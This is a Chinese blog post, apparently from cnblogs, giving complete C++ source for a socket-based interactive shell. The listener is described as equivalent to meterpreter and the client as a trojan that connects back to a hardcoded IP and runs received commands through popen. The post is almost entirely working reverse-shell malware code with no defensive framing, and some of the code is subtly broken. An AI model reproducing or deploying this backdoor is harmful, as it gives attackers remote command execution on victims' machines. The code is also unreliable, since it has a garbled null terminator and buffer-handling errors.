• Socket实现交互式shell代码


    Socket实现交互式shell

    使用socket系列函数实现,原理很简单,就不多说了.
    

    服务端代码: (相当于metepreter)

    #include <iostream>
    #include <cstdio>
    #include <cstring>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <unistd.h>
    #include <ctype.h>
    #include <arpa/inet.h>
    #include <cstdlib>
    #define SERVER_PORT 3456
    using namespace std;
    
    void shell() {
            int sock;
            struct sockaddr_in server_addr;
            sock = socket(AF_INET, SOCK_STREAM, 0);
    
            bzero(&server_addr, sizeof(server_addr));
            server_addr.sin_family = AF_INET;
            server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
            server_addr.sin_port = htons(SERVER_PORT);
    
            bind(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
    
    
            cout << "Waiting client..." << endl;
            listen(sock, 128);
            char *buf =(char *)malloc(0x1000);
            int text_len = 0;
    
            struct sockaddr_in client;
            int client_sock;
            char client_ip[64];
            socklen_t client_addr_len = sizeof(client);
    
            client_sock = accept(sock, (struct sockaddr *)&client, &client_addr_len);
            cout << "Successful connection!"
            << endl
            << "Client ip: "
            << "    port: "
            << ntohs(client.sin_port)
            << endl;
    
            while(true) {
                    text_len = read(client_sock, buf, 0x1000 - 1);
                    if(text_len > 0){
                            buf[text_len] = 'x00';
                            cout << buf;
    
                            fgets(buf, 0x200, stdin);
                            if(!strcmp(buf, "exit")) {
                                    cout << "Closed connection" << endl;
                                    write(client_sock, "exit", 0x5);
                                    break;
                            }
                            write(client_sock, buf, strlen(buf) + 1);
                    }
            }
            close(client_sock);
    
    }
    
    int main(void) {
            setbuf(stdin, 0);
            setbuf(stdout, 0);
            shell();
            return 0;
    }
    
    

    客户端代码: (相当于木马)

    #include <cstdlib>
    #include <iostream>
    #include <cstdio>
    #include <cstring>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #define SERVER_PORT 3456
    #define SERVER_IP "192.168.100.3"
    using namespace std;
    void exeCmd(const char *cmd, char *result)
    {
            char buf_ps[1024];
            char ps[1024]={0};
            FILE *ptr;
            strcpy(ps, cmd);
            if((ptr=popen(ps, "r"))!=NULL)
            {
                    while(fgets(buf_ps, 1024, ptr)!=NULL)
                    {
                    strcat(result, buf_ps);
    
    //              if(strlen(result) > 4000)
                    break;
            }
            pclose(ptr);
            ptr = NULL;
    
            }
            else
            {
                    cout << "popen error: " << ps << endl;
            }
    }
    void shell(){
            int sockfd = 0;
            struct sockaddr_in serveraddr;
            char *buf_r = (char *)malloc(0x1000);
            char *buf_w = (char *)malloc(0x1000);
            int text_len = 0;
    
            sockfd = socket(AF_INET, SOCK_STREAM, 0);
            bzero(&serveraddr, sizeof(struct sockaddr_in));
            serveraddr.sin_family = AF_INET;
    
            inet_pton(AF_INET, SERVER_IP, &serveraddr.sin_addr);
            serveraddr.sin_port = htons(SERVER_PORT);
    
            while(true){
                    cout << "connecting";
                    connect(sockfd, (struct sockaddr *)&serveraddr, sizeof(serveraddr));
                    if(sockfd > 0) {
                    cout << "connected!";
                    write(sockfd, "connected!", 0x10);
                            break;
                    }
            }
            while(true) {
                    text_len = read(sockfd, buf_r, 0x1000 - 1);
                    buf_r[text_len] = 'x00';
                    if(text_len > 0) {
                            exeCmd(buf_r, buf_w);
                            text_len = strlen(buf_w);
                            if(!strcmp(buf_r, "exit")) {
                                    break;
                            }
                            write(sockfd, buf_w, text_len + 1);
    
                    }
            }
            close(sockfd);
    }
    int main(void) {
            setbuf(stdin, 0);
            setbuf(stdout, 0);
            shell();
            return 0;
    }
    
  • 相关阅读:
    3.5星|津巴多《时间的悖论》:未来导向的人更有可能取得个人的成功,但帮助他人的可能性更小
    成功的销售必须在失败时也能快乐:4星|《哈佛商业评论》2018年第4期
    被取代的金融工作岗位越来越多:3星|《被人工智能操控的金融业》
    比特币和区块链是泡沫,但是短期内不会破:4星|《财经》2018年第7期
    点赞是当代可卡因:3星|《欲罢不能:刷屏时代如何摆脱行为上瘾》
    如何使用GetManifestResourceStream
    隐藏光标与获得光标2----获得光标所在的控件
    端口是否使用
    是否联网以及热点问题
    注册表操作
  • 原文地址:https://www.cnblogs.com/lyxf/p/12230440.html
一二三 - 开发者的网上家园